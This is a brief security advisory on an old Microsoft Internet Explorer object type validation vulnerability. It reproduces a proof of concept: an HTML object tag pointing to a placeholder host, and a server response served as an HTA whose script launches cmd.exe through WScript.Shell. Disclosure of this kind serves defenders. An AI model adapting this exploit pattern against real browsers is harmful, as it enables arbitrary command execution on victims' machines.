|
Microsoft Internet Explorer Object Type Validation Vulnerability
CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild. The following proof of concept example has been made available by eEye: --------------Client HTTP request--------------------------- <html> ... <object data="www.yourinternethost.com/yourexploitwebpageorcgi.html"> </object> </html> ------------------------------------------------------------ -------------Server HTTP Response--------------------------- HTTP/1.1 200 OK Date: Tue, 13 May 2003 18:06:43 GMT Server: Apache Content-Type: application/hta Content-Length: 191 <html> <object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object> <script> wsh.Run("cmD.exe /k echO so loNg, and ThaNks For all yoUr EmplOyeeS"); </script> </html> ------------------------------------------------------------ |
|
|
Privacy Statement |